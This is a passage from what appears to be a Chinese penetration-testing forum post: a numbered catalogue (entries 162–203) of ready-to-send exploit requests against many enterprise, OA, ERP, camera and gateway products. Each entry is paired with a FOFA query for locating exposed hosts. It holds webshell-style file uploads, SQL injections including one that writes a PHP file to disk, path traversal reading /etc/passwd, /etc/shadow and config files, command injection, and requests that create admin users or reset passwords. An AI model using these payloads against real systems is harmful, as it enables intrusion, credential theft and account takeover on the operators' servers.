<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing: attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) Clinical Browsing System deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (Short Video Matrix Marketing System) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) Omnimedia News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values in the request below:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2